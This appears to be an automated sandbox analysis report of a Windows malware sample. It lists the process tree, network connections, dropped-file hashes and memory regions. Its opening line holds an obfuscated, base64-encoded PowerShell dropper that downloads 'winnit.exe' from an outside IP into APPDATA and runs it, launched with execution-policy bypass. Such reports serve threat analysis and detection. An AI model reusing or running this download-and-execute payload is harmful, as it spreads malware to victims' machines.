AgICAgLU5hTWVzUEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHlZalRCc0pMcmx6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQODhXSWFja3NQOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MC93aW5uaXQuZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U1RBcnQtc0xlRVAoMyk7U3RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHdpbm5pdC5leGUi'+[cHaR]0x22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bypasS -NOp -w 1 -C DEViCEcReDeNtiALdEpLOYMeNT

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wmtbpe4r\wmtbpe4r.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9913.tmp" "c:\Users\Admin\AppData\Local\Temp\wmtbpe4r\CSC2F2BB2682638407FB6CE27D663A9546B.TMP"

C:\Users\Admin\AppData\Roaming\winnit.exe

"C:\Users\Admin\AppData\Roaming\winnit.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Users\Admin\AppData\Roaming\winnit.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 192.3.176.141:80 192.3.176.141 tcp
US 8.8.8.8:53 141.176.3.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp

Files

memory/3064-0-0x000000007124E000-0x000000007124F000-memory.dmp

memory/3064-1-0x0000000004A00000-0x0000000004A36000-memory.dmp

memory/3064-2-0x0000000005070000-0x0000000005698000-memory.dmp

memory/3064-3-0x0000000071240000-0x00000000719F0000-memory.dmp

memory/3064-4-0x0000000071240000-0x00000000719F0000-memory.dmp

memory/3064-5-0x0000000004FE0000-0x0000000005002000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jdoxc524.1cc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3064-7-0x0000000005970000-0x00000000059D6000-memory.dmp

memory/3064-6-0x0000000005900000-0x0000000005966000-memory.dmp

memory/3064-17-0x0000000005AE0000-0x0000000005E34000-memory.dmp

memory/3064-18-0x0000000004CF0000-0x0000000004D0E000-memory.dmp

memory/3064-19-0x0000000005FE0000-0x000000000602C000-memory.dmp

memory/4500-29-0x0000000007430000-0x0000000007462000-memory.dmp

memory/4500-30-0x000000006DB00000-0x000000006DB4C000-memory.dmp

memory/4500-40-0x00000000073F0000-0x000000000740E000-memory.dmp

memory/4500-41-0x0000000007470000-0x0000000007513000-memory.dmp

memory/4500-42-0x0000000007BF0000-0x000000000826A000-memory.dmp

memory/4500-43-0x00000000075B0000-0x00000000075CA000-memory.dmp

memory/4500-44-0x0000000007610000-0x000000000761A000-memory.dmp

memory/4500-45-0x0000000007840000-0x00000000078D6000-memory.dmp

memory/4500-46-0x00000000077B0000-0x00000000077C1000-memory.dmp

memory/4500-47-0x00000000077E0000-0x00000000077EE000-memory.dmp

memory/4500-48-0x00000000077F0000-0x0000000007804000-memory.dmp

memory/4500-49-0x0000000007900000-0x000000000791A000-memory.dmp

memory/4500-50-0x0000000007830000-0x0000000007838000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\wmtbpe4r\wmtbpe4r.cmdline

MD5 f3cfa86992985a2642454cd9d42e01cb
SHA1 669931cedfed3976aadd15489db435b4961f4aa3
SHA256 2089b075b787020fbe1edaef8ca6988d6514d12496946bcb9fd33a00c15ea9e2
SHA512 ef95f81562e3df6936c54cc840a459b5c02e8aa6920e5e2e587646c8c42c60a050343f10214acd754dc2bdbd074bc917243fbfbbe0f24192bc8bff666ed1bf6a

\??\c:\Users\Admin\AppData\Local\Temp\wmtbpe4r\wmtbpe4r.0.cs

MD5 465b4325ef1dc4adfed6e9822e476e55
SHA1 2fa23c543ae1210d7b44ed6410522ccb5671e001
SHA256 ba069a73c9bf86bc2bc6bfc8532e250817a987761f5ff33d9816c3581efa196c
SHA512 6acd9cdd680e29d3f81813a4011cd0252f0132834393a3c2b40e9ece2c9173accc46eccd29eb9712af8042a0e97472be8a2a265301742612aab28cb8a0f2c1e8

\??\c:\Users\Admin\AppData\Local\Temp\wmtbpe4r\CSC2F2BB2682638407FB6CE27D663A9546B.TMP

MD5 89eacbb3356343c2512f76d4fcb9b5f3
SHA1 2cd2057d5d7e233fa46b7ae04d130efb03dce2b7
SHA256 efad95b8e2f4d57a4a9a8589cf72b24e86269ad46e8f438af556dae76035634b
SHA512 bb38816368a265f44525fbc037d7b45ac4d0ffb08f05a110d2b3fb311a255be18c2d3e8defb8be8f2a1e4de177970d23e125f2575a2f7781596fe8226e46cf40

C:\Users\Admin\AppData\Local\Temp\RES9913.tmp

MD5 b31be863e2e93abda967e59ca7623657
SHA1 e61209adaf0658b64ed522b6531c7aad9fecc3c3
SHA256 4e68f835eba05b70f154a32a6dd96a96e686b27744fb033734ce08e723fbd6ef
SHA512 5fa35e09f8f469b38b8c95ecea68152606a0870c360cd367a591082287b5319195e14e4e669125004ec69f5d46615be9b4b990491221132b06fd0bb03cf7d2c0

C:\Users\Admin\AppData\Local\Temp\wmtbpe4r\wmtbpe4r.dll

MD5 aace8def1a3eeb5aaf77c1a12a7b5499
SHA1 45c55d71da9b52a823bf60923e25cc83b6a80ba9
SHA256 7a1e6dcf93852f382c22b7403515686c54d6d200ee009a2583b04a11e091fe07
SHA512 fd676b18f10a532019f8adb9cc4f65a325b7ec655042503aa09c58330bcc0f3849ae3ba443db7cdb05e81df97eebad5709e4bd9f25c8e39cfddfe29a1d31c1a7

memory/3064-65-0x0000000006560000-0x0000000006568000-memory.dmp

memory/3064-71-0x000000007124E000-0x000000007124F000-memory.dmp

memory/3064-72-0x0000000071240000-0x00000000719F0000-memory.dmp

memory/3064-73-0x0000000071240000-0x00000000719F0000-memory.dmp

memory/3064-74-0x0000000007380000-0x00000000073A2000-memory.dmp

memory/3064-75-0x0000000008280000-0x0000000008824000-memory.dmp

C:\Users\Admin\AppData\Roaming\winnit.exe

MD5 ed7480dfd2d2fd5742d7b4eff9c1d26d
SHA1 5a69a5ec59e9bfcd221ca0925d774516debfdf4b
SHA256 166fec0187fb56dd61b937fa2c903a762102e1c139b47682eafa4cce0e991e7d
SHA512 f19a8832f998225d0f1043422f6800377fcf7dda282ba88c8d333d3734a884eccadf28babd70ae7f9f249c29355b237dd690c03d74e207fbe6e12c866255270b

memory/4280-88-0x0000000000BC0000-0x0000000000DCD000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powERsHeLl.eXe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d6723982b84296942dfede67b68abdab
SHA1 50a7f7b4e9dadadb6d011e1cf784508ee58d7340
SHA256 64c89973630b26c76275853928199844e76fa4b5775949889f3b129fac6d58b4
SHA512 56f855ea1eb94efd5a54759e728c95fd0a7010d016ec0d933e9f70f2d855706a2b57d986abb62f96c815b2e1be1c7a39f867c6b913dd9f4aa63d280906b88764

memory/3064-90-0x0000000071240000-0x00000000719F0000-memory.dmp

memory/784-92-0x0000000000400000-0x0000000000446000-memory.dmp

memory/784-93-0x0000000000400000-0x0000000000446000-memory.dmp

memory/784-96-0x0000000002F30000-0x0000000002F84000-memory.dmp

memory/4280-95-0x0000000000BC0000-0x0000000000DCD000-memory.dmp

memory/784-97-0x0000000005450000-0x00000000054A2000-memory.dmp

memory/784-147-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-129-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-113-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-98-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-159-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-157-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-155-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-153-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-151-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-149-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-145-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-143-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-141-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-139-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-137-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-135-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-133-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-131-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-127-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-125-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-123-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-121-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-119-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-118-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-116-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-111-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-109-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-108-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-105-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-103-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-101-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-99-0x0000000005450000-0x000000000549D000-memory.dmp

memory/784-1128-0x0000000006580000-0x00000000065D0000-memory.dmp

memory/784-1129-0x0000000006670000-0x0000000006702000-memory.dmp

memory/784-1130-0x00000000065F0000-0x00000000065FA000-memory.dmp